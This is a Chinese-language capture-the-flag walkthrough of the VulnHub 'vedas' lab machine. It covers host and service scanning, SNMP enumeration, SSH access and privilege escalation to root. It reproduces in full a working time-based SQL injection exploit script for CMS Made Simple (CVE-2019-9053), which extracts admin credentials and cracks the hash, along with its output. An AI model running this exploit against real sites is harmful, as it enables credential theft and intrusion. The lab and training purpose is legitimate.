滲透測試-CTF-VulnHub - vedas
滲透測試學習-CTF
解析vedas的滲透過程
此靶機比較簡單隻做學習。新手學習高手繞過
滲透思路:1、主機發現
2、服務掃描
3、本地檔案包含
4、反向連結
5、ssh免密登入
靶機下載地址:https://download.vulnhub.com/ha/vedas.ova
可以去:www.vulnhub.com搜尋vedas下載靶機。
網路發現主機
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 10.10.10.1 appears to be up (VMware, Inc.).
[+] 10.10.10.2 appears to be up (VMware, Inc.).
[+] 10.10.10.128 appears to be up (VMware, Inc.).
[+] 10.10.10.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed服務發現
[*] exec: nmap -sV -p- 10.10.10.128
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-26 11:58 EST
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.00073s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:B4:75:F2 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelmsf6 auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 10.10.10.128->10.10.10.128 (1 hosts)
[*] Discovered SNMP on 10.10.10.128:161 (Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed這裡的UDP發現使用msf的udp_sweep因為nmap下的udp很慢不知道什麼原因,百度幾篇文章也沒有解決(有知道的大佬可以留言告知)
使用snmp_enum檢視資訊
msf6 auxiliary(scanner/snmp/snmp_enum) > run
[+] 10.10.10.128, Connected.
[*] System information:
Host IP : 10.10.10.128
Hostname : ubuntu
Description : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Contact : Way to Root:1 (0e462097431)
Location : Rig Veda: {0e87105d070afcb11c7264cc13f2e86b}
Uptime snmp : 00:39:24.47
Uptime system : 00:39:12.40
System date : 2020-12-26 09:29:30.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
找到第一個flag
瀏覽器開啟ip檢視網站資訊dirb目錄掃描只有靜態頁面如下
使用cewl製作字典檔案再次進行dirb遍歷
root@kali:~# dirb http://10.10.10.128 /root/dic.txt
START_TIME: Sat Dec 26 12:33:57 2020
URL_BASE: http://10.10.10.128/
WORDLIST_FILES: /root/dic.txt
==> DIRECTORY: http://10.10.10.128/images/
==> DIRECTORY: http://10.10.10.128/Kashyapa/ 找到新目錄訪問http://10.10.10.128/Kashyapa/
可以看到是CMSMS的站點或是使用whatweb檢視
root@kali:~# whatweb http://10.10.10.128/Kashyapa/
http://10.10.10.128/Kashyapa/ [200 OK] Apache[2.4.29], CMS-Made-Simple[2.2.8], Cookies[CMSSESSIDcb079ad4d4cb], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.128], JQuery[1.11.1], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.], Script[text/javascript], Title[Home - Vedas]查詢CMS漏洞資訊存在CVE-2019-9053
獲取POC程式碼
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
url_vuln = 'http://10.10.10.128/Kashyapa/moduleinterface.php?mact=News,m1_,default,0&m1_idlist='
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
sleep_time = 1
username = ""
result = ""
email = ""
salt = ""
def get_salt():
global flag
global salt
global result
salt = ""
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= sleep_time:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
result += '\n[+] Salt for password found: ' + salt
def get_username(userid):
global flag
global username
global result
username = ""
ord_username = ""
ord_username_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_username = username + dictionary[i]
ord_username_temp = ord_username + hex(ord(dictionary[i]))[2:]
payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+username+like+0x" + ord_username_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
url = url_vuln + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= sleep_time:
flag = True
break
if flag:
username = temp_username
ord_username = ord_username_temp
result += '\n[+] Username found: ' + username
flag = True
if username:
return True
else:
return False
def get_email(userid):
global flag
global email
global result
email = ""
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
url = url_vuln + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= sleep_time:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
result += '\n[+] Email found: ' + email
flag = True
def get_password(userid):
global flag
global password
global result
password = ""
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
payload = "0,1,2))+and+(select+sleep(" + str(sleep_time) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id%3d{id})+--+".format(id=userid)
url = url_vuln + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= sleep_time:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
result += '\n[+] Password found: ' + password
def crack_password():
global password
global result
global salt
dict = open("/root/dic.txt") #修改生成的字典檔案地址
for line in dict.readlines():
line = line.replace("\n", "")
if hashlib.md5(str(salt) + line).hexdigest() == password:
result += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print():
global result
cprint(result,'green', attrs=['bold'])
def main():
global result
for i in range(1, 10):
get_salt()
user_exist = get_username(i)
if user_exist:
get_email(i)
get_password(i)
crack_password()
beautify_print()
result = ""
else:
break
main()執行poc
root@kali:~/Desktop# python2 poc.py
[+] Salt for password found: 65bd8602d290b16d
[+] Username found: atri
[+] Email found: abcd@gmail.com
[+] Password found: 49ba135760e8265758ae48ef5c7338c7
[+] Password cracked: anasuya 使用賬號登入CMSMS後臺 http://10.10.10.128/Kashyapa/admin/login.php
瀏覽資訊獲取第二個flag
Yagur Veda: {81b44a402a34a850dfcf1e277a18234d}
Way to Root:2 (906509019)
服務開啟了ssh通過獲取的資訊嘗試登入atri賬號
root@kali:~/Desktop# ssh atri@10.10.10.128
atri@10.10.10.128's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
New release '20.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Dec 25 21:49:53 2020 from 10.10.10.200
atri@ubuntu:~$
成功登入
檢視本地目錄
atri@ubuntu:/$ ls
bin dev home initrd.img.old lib64 media opt root sbin swapfile tmp var vmlinuz.old
boot etc initrd.img lib lost+found mnt proc run srv sys usr vmlinuz
atri@ubuntu:/$ cd opt
atri@ubuntu:/opt$ ls
test
atri@ubuntu:/opt$ cd test
atri@ubuntu:/opt/test$ ls
index.html
atri@ubuntu:/opt/test$ cat index.html
Sama Veda: {c9a9aeb104157fb92f781714d010099c}
Way to Root:3 (562988736854)
atri@ubuntu:/opt/test$
找到第三個flag
三個flag有個共同的點 Way to Root做字串連線後 0e462097431906509019562988736854 查詢密碼結果 240610708
檢視home目錄其他使用者的資訊 並嘗試使用密碼登入
atri@ubuntu:/home$ ls
atri vedas
atri@ubuntu:/home$ su vedas
Password:
406su: Authentication failure
atri@ubuntu:/home$ 40610708
40610708: command not found
atri@ubuntu:/home$ su vedas
Password:
vedas@ubuntu:/home$ sudo bash
[sudo] password for vedas:
root@ubuntu:/home# ls
atri vedas
root@ubuntu:/home# cd /root/
root@ubuntu:/root# ls
final.txt
root@ubuntu:/root# cat final.txt
▄█ █▄ ▄████████ ████████▄ ▄████████ ▄████████
███ ███ ███ ███ ███ ▀███ ███ ███ ███ ███
███ ███ ███ █▀ ███ ███ ███ ███ ███ █▀
███ ███ ▄███▄▄▄ ███ ███ ███ ███ ███
███ ███ ▀▀███▀▀▀ ███ ███ ▀███████████ ▀███████████
███ ███ ███ █▄ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ▄███ ███ ███ ▄█ ███
▀██████▀ ██████████ ████████▀ ███ █▀ ▄████████▀
Atharva Veda: {c08cddc7f3bac6f00c00408c6d2274dc}
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/hackinarticles
Vishva Vaghela : www.linkedin.com/in/vishvavaghela
相關文章
- 滲透測試會用到哪些工具?滲透測試教程
- Linux滲透測試Linux
- 什麼是滲透測試?為什麼要做滲透測試?
- 什麼是滲透測試?滲透測試分類方式有哪些?
- 滲透測試怎麼做?滲透測試的步驟有哪些?
- 你真的瞭解“滲透測試”嗎?滲透測試有何作用?
- 什麼是滲透測試?滲透測試分為哪幾類?
- 【滲透測試】Vulnhub DarkHole
- 滲透測試報告測試報告
- 滲透測試之nmap
- 什麼是滲透測試?滲透測試的服務方式有哪些?
- 什麼是滲透測試?滲透測試培訓班如何選擇?
- 滲透測試什麼?滲透測試具體操作流程是什麼
- 網路安全滲透測試的型別!滲透測試入門教程型別
- metasploit滲透測試筆記(內網滲透篇)筆記內網
- 什麼是滲透測試?網站有必要進行滲透測試嗎?網站
- 滲透測試是什麼?滲透測試三種分類主要包括哪些?
- 【滲透測試】Vulnhub Hackable II
- Web 端滲透測試初探Web
- GraphQL滲透測試詳解
- 滲透測試-資訊收集
- 滲透測試之域名收集
- 滲透測試——資訊收集
- 滲透測試------資訊收集
- Burpsuite 滲透測試工具使用UI
- 滲透測試實驗二
- beescms網站滲透測試網站
- FLUXION參考滲透測試UX
- 滲透測試技巧總結
- 物理滲透測試基礎
- 網路安全滲透測試
- [雪峰磁針石部落格]滲透測試簡介1滲透測試簡介
- 安全測試和滲透測試的區別
- 為什麼滲透測試很重要?滲透測試的服務方式有幾種?
- 滲透測試(PenTest)基礎指南
- linux滲透測試技巧2則Linux
- 滲透測試之資訊收集
- 滲透測試工具Burpsuite操作教程UI